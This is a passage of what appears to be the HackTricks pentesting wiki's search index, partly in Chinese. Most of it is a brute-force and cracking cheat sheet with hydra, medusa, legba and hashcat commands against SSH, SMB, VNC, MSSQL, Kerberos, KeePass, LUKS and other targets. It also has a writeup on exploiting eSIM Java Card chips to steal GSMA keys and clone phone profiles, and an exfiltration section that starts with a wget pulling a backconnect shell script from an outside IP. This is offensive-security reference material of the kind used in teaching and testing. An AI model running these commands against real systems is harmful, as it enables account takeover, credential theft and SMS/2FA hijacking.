Redis","id":"1081","title":"Redis"},"1082":{"body":"bash hydra -l -P rexec:// -v -V","breadcrumbs":"Brute Force - CheatSheet » Rexec","id":"1082","title":"Rexec"},"1083":{"body":"bash hydra -l -P rlogin:// -v -V","breadcrumbs":"Brute Force - CheatSheet » Rlogin","id":"1083","title":"Rlogin"},"1084":{"body":"bash hydra -L rsh:// -v -V http://pentestmonkey.net/tools/misc/rsh-grind","breadcrumbs":"Brute Force - CheatSheet » Rsh","id":"1084","title":"Rsh"},"1085":{"body":"bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ","breadcrumbs":"Brute Force - CheatSheet » Rsync","id":"1085","title":"Rsync"},"1086":{"body":"bash hydra -l root -P passwords.txt rtsp","breadcrumbs":"Brute Force - CheatSheet » RTSP","id":"1086","title":"RTSP"},"1087":{"body":"bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22\\n# Try keys from a folder\\nlegba sftp --username admin --password \'@/some/path/*\' --ssh-auth-mode key --target localhost:22","breadcrumbs":"Brute Force - CheatSheet » SFTP","id":"1087","title":"SFTP"},"1088":{"body":"bash msf> use auxiliary/scanner/snmp/snmp_login\\nnmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ]\\nonesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt \\nhydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp","breadcrumbs":"Brute Force - CheatSheet » SNMP","id":"1088","title":"SNMP"},"1089":{"body":"bash nmap --script smb-brute -p 445 \\nhydra -l Administrator -P words.txt 192.168.1.12 smb -t 1\\nlegba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ]","breadcrumbs":"Brute Force - CheatSheet » SMB","id":"1089","title":"SMB"},"109":{"body":"Nmap Summary (ESP)","breadcrumbs":"Pentesting Network » 更多 nmap 选项","id":"109","title":"更多 nmap 选项"},"1090":{"body":"bash hydra -l -P /path/to/passwords.txt smtp -V\\nhydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL\\nlegba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ]","breadcrumbs":"Brute Force - CheatSheet » SMTP","id":"1090","title":"SMTP"},"1091":{"body":"bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 \\nlegba socks5 --target localhost:1080 --username admin --password data/passwords.txt\\n# With alternative address\\nlegba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address \'internal.company.com\' --socks5-port 8080","breadcrumbs":"Brute Force - CheatSheet » SOCKS","id":"1091","title":"SOCKS"},"1092":{"body":"bash #Use the NetBIOS name of the machine as domain\\ncrackmapexec mssql -d -u usernames.txt -p passwords.txt\\nhydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt mssql\\nmedusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql\\nnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts\\nmsf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT","breadcrumbs":"Brute Force - CheatSheet » SQL Server","id":"1092","title":"SQL Server"},"1093":{"body":"bash hydra -l root -P passwords.txt [-t 32] ssh\\nncrack -p 22 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M ssh\\npatator ssh_login host= port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg=\'Authentication failed\'\\nlegba ssh --username admin --password wordlists/passwords.txt --target localhost:22\\n# Try keys from a folder\\nlegba ssh --username admin --password \'@/some/path/*\' --ssh-auth-mode key --target localhost:22 弱 SSH 密钥 / Debian 可预测 PRNG 某些系统在生成加密材料时使用的随机种子存在已知缺陷。这可能导致密钥空间显著减少,可以使用工具如 snowdroppe/ssh-keybrute 进行暴力破解。也可以找到预生成的弱密钥集,如 g0tmi1k/debian-ssh 。","breadcrumbs":"Brute Force - CheatSheet » SSH","id":"1093","title":"SSH"},"1094":{"body":"STOMP 文本协议是一种广泛使用的消息传递协议, 允许与流行的消息队列服务如 RabbitMQ、ActiveMQ、HornetQ 和 OpenMQ 进行无缝通信和交互 。它提供了一种标准化和高效的方法来交换消息并执行各种消息操作。 bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » STOMP (ActiveMQ, RabbitMQ, HornetQ 和 OpenMQ)","id":"1094","title":"STOMP (ActiveMQ, RabbitMQ, HornetQ 和 OpenMQ)"},"1095":{"body":"bash hydra -l root -P passwords.txt [-t 32] telnet\\nncrack -p 23 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \\\\\\n--username admin \\\\\\n--password wordlists/passwords.txt \\\\\\n--target localhost:23 \\\\\\n--telnet-user-prompt \\"login: \\" \\\\\\n--telnet-pass-prompt \\"Password: \\" \\\\\\n--telnet-prompt \\":~$ \\" \\\\\\n--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin","breadcrumbs":"Brute Force - CheatSheet » Telnet","id":"1095","title":"Telnet"},"1096":{"body":"bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc\\nmedusa -h –u root -P /root/Desktop/pass.txt –M vnc\\nncrack -V --user root -P /root/Desktop/pass.txt :>POR>T\\npatator vnc_login host= password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=\'Authentication failure\' --max-retries 0 –x quit:code=0\\nuse auxiliary/scanner/vnc/vnc_login\\nnmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt \\nlegba vnc --target localhost:5901 --password data/passwords.txt #Metasploit\\nuse auxiliary/scanner/vnc/vnc_login\\nset RHOSTS \\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst","breadcrumbs":"Brute Force - CheatSheet » VNC","id":"1096","title":"VNC"},"1097":{"body":"bash crackmapexec winrm -d -u usernames.txt -p passwords.txt","breadcrumbs":"Brute Force - CheatSheet » Winrm","id":"1097","title":"Winrm"},"1098":{"body":"","breadcrumbs":"Brute Force - CheatSheet » 本地","id":"1098","title":"本地"},"1099":{"body":"http://hashtoolkit.com/reverse-hash? (MD5 & SHA1) https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 有/无 ESS/SSP 和任何挑战值) https://www.onlinehashcrack.com/ (哈希,WPA2 捕获,以及 MSOffice、ZIP、PDF 等档案...) https://crackstation.net/ (哈希) https://md5decrypt.net/ (MD5) https://gpuhash.me/ (哈希和文件哈希) https://hashes.org/search.php (哈希) https://www.cmd5.org/ (哈希) https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) https://www.md5online.org/md5-decrypt.html (MD5) http://reverse-hash-lookup.online-domain-tools.com/ 在尝试暴力破解哈希之前,请查看此内容。","breadcrumbs":"Brute Force - CheatSheet » 在线破解数据库","id":"1099","title":"在线破解数据库"},"11":{"body":"WebSec 是一家总部位于 阿姆斯特丹 的专业网络安全公司,帮助 保护 全球企业免受最新网络安全威胁,通过提供 进攻性安全服务 采用 现代 方法。 WebSec 是一家国际安全公司,在阿姆斯特丹和怀俄明州设有办事处。他们提供 一体化安全服务 ,这意味着他们可以做所有事情;渗透测试、 安全 审计、意识培训、网络钓鱼活动、代码审查、漏洞开发、安全专家外包等等。 WebSec 的另一个酷点是,与行业平均水平不同,WebSec 对他们的技能 非常自信 ,以至于他们 保证最佳质量结果 ,他们在网站上声明“ 如果我们无法攻破它,您就不需要支付! ”。有关更多信息,请查看他们的 网站 和 博客 ! 除了上述内容,WebSec 还是 HackTricks 的坚定支持者 。 - YouTube","breadcrumbs":"HackTricks » WebSec","id":"11","title":"WebSec"},"110":{"body":"配置错误的 routers、firewalls 和 network devices 有时会在响应网络探测时使用 非公网源地址 。可以使用 tcpdump 在测试期间识别从私有地址接收到的 packets。具体来说,在 Kali Linux 上,可以在可从公共 Internet 访问的 eth2 interface 上捕获 packets。需要注意的是,如果你的设置位于 NAT 或 Firewall 之后,此类 packets 很可能会被过滤掉。 bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16\\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\\nlistening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes\\nIP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64\\nIP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64","breadcrumbs":"Pentesting Network » 揭示内部 IP 地址","id":"110","title":"揭示内部 IP 地址"},"1100":{"body":"bash #sudo apt-get install fcrackzip\\nfcrackzip -u -D -p \'/usr/share/wordlists/rockyou.txt\' chall.zip bash zip2john file.zip > zip.john\\njohn zip.john bash #$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$\\nhashcat.exe -m 13600 -a 0 .\\\\hashzip.txt .\\\\wordlists\\\\rockyou.txt\\n.\\\\hashcat.exe -m 13600 -i -a 0 .\\\\hashzip.txt #Incremental attack 已知明文 zip 攻击 您需要知道加密 zip 中包含的文件的 明文 (或部分明文)。您可以通过运行 7z l encrypted.zip 来检查加密 zip 中包含的 文件名和文件大小 。 从发布页面下载 bkcrack 。 bash # You need to create a zip file containing only the file that is inside the encrypted zip\\nzip plaintext.zip plaintext.file ./bkcrack -C -c -P -p \\n# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18\\n# With that key you can create a new zip file with the content of encrypted.zip\\n# but with a different pass that you set (so you can decrypt it)\\n./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd\\nunzip unlocked.zip #User new_pwd as password","breadcrumbs":"Brute Force - CheatSheet » ZIP","id":"1100","title":"ZIP"},"1101":{"body":"bash cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z bash #Download and install requirements for 7z2john\\nwget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl\\napt-get install libcompress-raw-lzma-perl\\n./7z2john.pl file.7z > 7zhash.john","breadcrumbs":"Brute Force - CheatSheet » 7z","id":"1101","title":"7z"},"1102":{"body":"bash apt-get install pdfcrack\\npdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt\\n#pdf2john didn\'t work well, john didn\'t know which hash type was\\n# To permanently decrypt the pdf\\nsudo apt-get install qpdf\\nqpdf --password= --decrypt encrypted.pdf plaintext.pdf","breadcrumbs":"Brute Force - CheatSheet » PDF","id":"1102","title":"PDF"},"1103":{"body":"要破解 PDF 拥有者密码,请查看此链接: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/","breadcrumbs":"Brute Force - CheatSheet » PDF Owner Password","id":"1103","title":"PDF Owner Password"},"1104":{"body":"bash git clone https://github.com/Sjord/jwtcrack.git\\ncd jwtcrack #Bruteforce using crackjwt.py\\npython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt #Bruteforce using john\\npython jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john\\njohn jwt.john #It does not work with Kali-John","breadcrumbs":"Brute Force - CheatSheet » JWT","id":"1104","title":"JWT"},"1105":{"body":"bash Format:USUARIO:ID:HASH_LM:HASH_NT:::\\njohn --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes\\nhashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot","breadcrumbs":"Brute Force - CheatSheet » NTLM 破解","id":"1105","title":"NTLM 破解"},"1106":{"body":"bash sudo apt-get install -y kpcli #Install keepass tools like keepass2john\\nkeepass2john file.kdbx > hash #The keepass is only using password\\nkeepass2john -k file.kdbx > hash # The keepass is also using a file as a needed credential\\n#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john\\njohn --wordlist=/usr/share/wordlists/rockyou.txt hash","breadcrumbs":"Brute Force - CheatSheet » Keepass","id":"1106","title":"Keepass"},"1107":{"body":"bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast\\nhashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt\\n./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi","breadcrumbs":"Brute Force - CheatSheet » Keberoasting","id":"1107","title":"Keberoasting"},"1108":{"body":"方法 1 安装: https://github.com/glv2/bruteforce-luks bash bruteforce-luks -f ./list.txt ./backup.img\\ncryptsetup luksOpen backup.img mylucksopen\\nls /dev/mapper/ #You should find here the image mylucksopen\\nmount /dev/mapper/mylucksopen /mnt 方法 2 bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096\\ndd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1\\nhashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt\\ncryptsetup luksOpen backup.img mylucksopen\\nls /dev/mapper/ #You should find here the image mylucksopen\\nmount /dev/mapper/mylucksopen /mnt 另一个 Luks BF 教程: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1","breadcrumbs":"Brute Force - CheatSheet » Lucks 图像","id":"1108","title":"Lucks 图像"},"1109":{"body":"bash #John hash format\\n:$mysqlna$*\\ndbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d","breadcrumbs":"Brute Force - CheatSheet » Mysql","id":"1109","title":"Mysql"},"111":{"body":"通过 Sniffing,可以通过查看捕获的 frames and packets 来了解 IP ranges、subnet sizes、MAC addresses 和 hostnames 的详细信息。如果网络配置错误或 switching fabric 在承压时,攻击者可以通过 passive network sniffing 捕获敏感数据。 如果 switched Ethernet network 配置正确,你通常只会看到 broadcast frames 和发送到你 MAC address 的数据。","breadcrumbs":"Pentesting Network » Sniffing","id":"111","title":"Sniffing"},"1110":{"body":"bash gpg2john private_pgp.key #This will generate the hash and save it in a file\\njohn --wordlist=/usr/share/wordlists/rockyou.txt ./hash","breadcrumbs":"Brute Force - CheatSheet » PGP/GPG 私钥","id":"1110","title":"PGP/GPG 私钥"},"1111":{"body":"","breadcrumbs":"Brute Force - CheatSheet » Cisco","id":"1111","title":"Cisco"},"1112":{"body":"使用 https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py 然后使用 john","breadcrumbs":"Brute Force - CheatSheet » DPAPI 主密钥","id":"1112","title":"DPAPI 主密钥"},"1113":{"body":"如果你有一个带有密码保护的列的 xlsx 文件,你可以解除保护: 上传到 Google Drive ,密码将自动移除 要 手动 移除 : bash unzip file.xlsx\\ngrep -R \\"sheetProtection\\" ./*\\n# Find something like: \\n# Remove that line and rezip the file\\nzip -r file.xls .","breadcrumbs":"Brute Force - CheatSheet » Open Office 密码保护的列","id":"1113","title":"Open Office 密码保护的列"},"1114":{"body":"bash # From https://github.com/Ridter/p12tool\\n./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt\\n# From https://github.com/crackpkcs12/crackpkcs12\\ncrackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx","breadcrumbs":"Brute Force - CheatSheet » PFX 证书","id":"1114","title":"PFX 证书"},"1115":{"body":"哈希示例: https://openwall.info/wiki/john/sample-hashes","breadcrumbs":"Brute Force - CheatSheet » 工具","id":"1115","title":"工具"},"1116":{"body":"bash hash-identifier\\n> ","breadcrumbs":"Brute Force - CheatSheet » Hash-identifier","id":"1116","title":"Hash-identifier"},"1117":{"body":"Rockyou Probable-Wordlists Kaonashi Seclists - Passwords","breadcrumbs":"Brute Force - CheatSheet » Wordlists","id":"1117","title":"Wordlists"},"1118":{"body":"kwprocessor : 高级键盘行走生成器,具有可配置的基本字符、键盘映射和路线。 bash kwp64.exe basechars\\\\custom.base keymaps\\\\uk.keymap routes\\\\2-to-10-max-3-direction-changes.route -o D:\\\\Tools\\\\keywalk.txt","breadcrumbs":"Brute Force - CheatSheet » Wordlist Generation Tools","id":"1118","title":"Wordlist Generation Tools"},"1119":{"body":"读取 /etc/john/john.conf 并进行配置 bash john --wordlist=words.txt --rules --stdout > w_mutated.txt\\njohn --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules","breadcrumbs":"Brute Force - CheatSheet » John mutation","id":"1119","title":"John mutation"},"112":{"body":"bash sudo tcpdump -i udp port 53 #Listen to DNS request to discover what is searching the host\\ntcpdump -i icmp #Listen to icmp packets\\nsudo bash -c \\"sudo nohup tcpdump -i eth0 -G 300 -w \\\\\\"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\\\\\\" -W 50 \'tcp and (port 80 or port 443)\' &\\" 也可以通过 SSH 会话从远程机器捕获数据包,并使用 Wireshark 作为 GUI 实时查看。 ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -\\nssh @ tcpdump -i -U -s0 -w - \'port not 22\' | sudo wireshark -k -i - # Exclude SSH traffic","breadcrumbs":"Pentesting Network » TCPDump","id":"112","title":"TCPDump"},"1120":{"body":"Hashcat 攻击 字典攻击 (-a 0) 带规则 Hashcat 已经附带一个 包含规则的文件夹 ,但你可以在 这里找到其他有趣的规则 。 hashcat.exe -a 0 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\rockyou.txt -r rules\\\\best64.rule Wordlist combinator 攻击 可以使用 hashcat 将 2 个字典组合成 1 个 。 如果列表 1 包含单词 \\"hello\\" ,而第二个列表包含 2 行单词 \\"world\\" 和 \\"earth\\" 。将生成单词 helloworld 和 helloearth。 bash # This will combine 2 wordlists\\nhashcat.exe -a 1 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\wordlist1.txt .\\\\wordlist2.txt # Same attack as before but adding chars in the newly generated words\\n# In the previous example this will generate:\\n## hello-world!\\n## hello-earth!\\nhashcat.exe -a 1 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\wordlist1.txt .\\\\wordlist2.txt -j $- -k $! 掩码攻击 (-a 3) bash # Mask attack with simple mask\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt ?u?l?l?l?l?l?l?l?d hashcat --help #will show the charsets and are as follows\\n? | Charset\\n===+=========\\nl | abcdefghijklmnopqrstuvwxyz\\nu | ABCDEFGHIJKLMNOPQRSTUVWXYZ\\nd | 0123456789\\nh | 0123456789abcdef\\nH | 0123456789ABCDEF\\ns | !\\"#$%&\'()*+,-./:;<=>?@[\\\\]^_`{|}~\\na | ?l?u?d?s\\nb | 0x00 - 0xff # Mask attack declaring custom charset\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1\\n## -1 ?d?s defines a custom charset (digits and specials).\\n## ?u?l?l?l?l?l?l?l?1 is the mask, where \\"?1\\" is the custom charset. # Mask attack with variable password length\\n## Create a file called masks.hcmask with this content:\\n?d?s,?u?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?l?l?1\\n## Use it to crack the password\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\masks.hcmask 字典 + 掩码 (-a 6) / 掩码 + 字典 (-a 7) 攻击 bash # Mask numbers will be appended to each word in the wordlist\\nhashcat.exe -a 6 -m 1000 C:\\\\Temp\\\\ntlm.txt \\\\wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist\\nhashcat.exe -a 7 -m 1000 C:\\\\Temp\\\\ntlm.txt ?d?d?d?d \\\\wordlist.txt Hashcat 模式 bash hashcat --example-hashes | grep -B1 -A2 \\"NTLM\\" 破解Linux哈希 - /etc/shadow文件 500 | md5crypt $1$, MD5(Unix) | Operating-Systems\\n3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems\\n7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems\\n1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems 破解Windows哈希 3000 | LM | Operating-Systems\\n1000 | NTLM | Operating-Systems 破解常见应用程序哈希 900 | MD4 | Raw Hash\\n0 | MD5 | Raw Hash\\n5100 | Half MD5 | Raw Hash\\n100 | SHA1 | Raw Hash\\n10800 | SHA-384 | Raw Hash\\n1400 | SHA-256 | Raw Hash\\n1700 | SHA-512 | Raw Hash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Brute Force - CheatSheet » Hashcat","id":"1120","title":"Hashcat"},"1121":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esim Javacard Exploitation » eSIM / Java Card VM Exploitation","id":"1121","title":"eSIM / Java Card VM Exploitation"},"1122":{"body":"嵌入式SIM(eSIM)作为 嵌入式UICC(eUICC) 智能卡实现,运行在安全元件上的 Java Card虚拟机(JC VM) 上。由于配置文件和小程序可以通过远程SIM配置(RSP) 空中 (OTA)进行配置,因此JC VM内部的任何内存安全缺陷瞬间成为 手机最特权组件内部的远程代码执行原语 。 本页面描述了由于getfield和putfield字节码中缺少类型安全检查而导致的Kigen的eUICC(Infineon SLC37 ESA1M2,ARM SC300)的真实世界完全妥协。相同的技术可以在其他省略卡上字节码验证的供应商中重用。","breadcrumbs":"Esim Javacard Exploitation » 概述","id":"1122","title":"概述"},"1123":{"body":"远程应用管理(RAM) eSIM配置文件可以嵌入任意Java Card小程序。配置通过标准APDU进行,可以通过SMS-PP(短消息服务点对点)或HTTPS进行隧道传输。如果攻击者拥有(或窃取)配置文件的 RAM密钥 ,他们可以远程INSTALL/LOAD恶意小程序。 Java Card字节码执行 安装后,小程序在VM内部执行。缺少运行时检查会导致内存损坏。","breadcrumbs":"Esim Javacard Exploitation » 攻击面","id":"1123","title":"攻击面"},"1124":{"body":"getfield / putfield应该仅在 对象引用 上操作。在Kigen eUICC中,这些指令从不验证栈上的操作数是 对象 还是 数组 引用。由于array.length字在正常对象的第一个实例字段的确切偏移量上,因此攻击者可以: 创建一个字节数组byte[] buf = new byte[0x100]; 将其强制转换为Object o = (Object)buf; 使用putfield覆盖相邻对象内部的 任何 16位值(包括VTABLE / ptr翻译条目)。 一旦内部指针被劫持,使用getfield读取 任意 内存。 java // Pseudo-bytecode sequence executed by the malicious applet\\n// buf = newarray byte 0x100\\n// o = (Object) buf // illegal but not verified\\n// putfield , 0xCAFE // arbitrary write\\n// ... set up read-what-where gadgets ... 该原语提供了 任意读取/写入 eUICC地址空间的能力——足以转储设备唯一的ECC私钥,该密钥用于验证卡片与GSMA生态系统的连接。","breadcrumbs":"Esim Javacard Exploitation » 类型混淆原语","id":"1124","title":"类型混淆原语"},"1125":{"body":"枚举固件 – 使用未记录的GET DATA项DF1F: 80 CA DF 1F 00 // → \\"ECu10.13\\" (易受攻击) OTA安装恶意applet – 滥用TS.48通用测试配置文件的公开已知密钥,并推送传输CAP文件的SMS-PP片段(LOAD)后跟INSTALL: // 简化的APDU链\\n80 E6 02 00 // LOAD (块 n)\\n80 E6 0C 00 // INSTALL for load 触发类型混淆 – 当选择applet时,它执行写入-什么-在哪里操作以劫持指针表,并通过正常的APDU响应泄露内存。 提取GSMA证书密钥 – 私有EC密钥被复制到applet的RAM中并分块返回。 冒充eUICC – 被盗的密钥对+证书使攻击者能够作为合法卡片向 任何 RSP服务器进行身份验证(某些运营商可能仍需EID绑定)。 下载和修改配置文件 – 明文配置文件包含高度敏感的字段,如OPc、AMF、OTA密钥甚至额外的applet。攻击者可以: 将配置文件克隆到第二个eUICC(语音/SMS劫持); 在重新上传之前修补Java Card应用程序(例如,插入STK间谍软件); 提取运营商秘密以进行大规模滥用。","breadcrumbs":"Esim Javacard Exploitation » 端到端利用工作流程","id":"1125","title":"端到端利用工作流程"},"1126":{"body":"在 PHONE A 和 PHONE B 上安装相同的配置文件会导致移动交换中心将传入流量路由到最近注册的设备。一次Gmail 2FA SMS拦截会话足以绕过受害者的多因素身份验证。","breadcrumbs":"Esim Javacard Exploitation » 克隆/劫持演示","id":"1126","title":"克隆/劫持演示"},"1127":{"body":"研究人员发布了一个内部工具,带有bsc( 基本安全检查 )命令,可以立即显示Java Card VM是否易受攻击: scard> bsc\\n- castcheck [arbitrary int/obj casts]\\n- ptrgranularity [pointer granularity/tr table presence]\\n- locvaraccess [local variable access]\\n- stkframeaccess [stack frame access]\\n- instfieldaccess [instance field access]\\n- objarrconfusion [object/array size field confusion] 框架附带的模块: introspector – 完整的虚拟机和内存探索器 (~1.7 MB Java) security-test – 通用验证绕过小程序 (~150 KB) exploit – 100% 可靠的 Kigen eUICC 破坏 (~72 KB)","breadcrumbs":"Esim Javacard Exploitation » 自动化测试与利用工具包","id":"1127","title":"自动化测试与利用工具包"},"1128":{"body":"卡内字节码验证 – 强制执行完整的控制流和数据流类型跟踪,而不仅仅是栈顶。 隐藏数组头 – 将 length 放置在重叠对象字段之外。 加强 RAM 密钥策略 – 永远不要随公共密钥一起发布配置文件;在测试配置文件中禁用 INSTALL(在 GSMA TS.48 v7 中解决)。 RSP 服务器端启发式 – 限制每个 EID 的配置文件下载速率,监控地理异常,验证证书的新鲜度。","breadcrumbs":"Esim Javacard Exploitation » 缓解措施","id":"1128","title":"缓解措施"},"1129":{"body":"查询 GET DATA DF1F – 易受攻击的固件字符串 ECu10.13 表示 Kigen。 检查 RAM 密钥是否已知 ‑> 尝试 OTA INSTALL/LOAD。 在小程序安装后,暴力破解简单的类型转换原始类型(objarrconfusion)。 尝试读取安全域私钥 – 成功 = 完全破坏。","breadcrumbs":"Esim Javacard Exploitation » 渗透测试人员快速检查清单","id":"1129","title":"渗透测试人员快速检查清单"},"113":{"body":"bash net.sniff on\\nnet.sniff stats\\nset net.sniff.output sniffed.pcap #Write captured packets to file\\nset net.sniff.local #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)\\nset net.sniff.filter #BPF filter for the sniffer (default=not arp)\\nset net.sniff.regexp #If set only packets matching this regex will be considered","breadcrumbs":"Pentesting Network » Bettercap","id":"113","title":"Bettercap"},"1130":{"body":"Security Explorations – eSIM security GSMA TS.48 Generic Test Profile v7.0 Java Card VM Specification 3.1 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esim Javacard Exploitation » 参考文献","id":"1130","title":"参考文献"},"1131":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Exfiltration » Exfiltration","id":"1131","title":"Exfiltration"},"1132":{"body":"查看 https://lots-project.com/ 以查找可以被滥用的常见白名单域名","breadcrumbs":"Exfiltration » 常见的白名单域名以提取信息","id":"1132","title":"常见的白名单域名以提取信息"},"1133":{"body":"Linux bash base64 -w0 #Encode file\\nbase64 -d file #Decode file Windows certutil -encode payload.dll payload.b64\\ncertutil -decode payload.b64 payload.dll","breadcrumbs":"Exfiltration » Copy&Paste Base64","id":"1133","title":"Copy&Paste Base64"},"1134":{"body":"Linux bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O 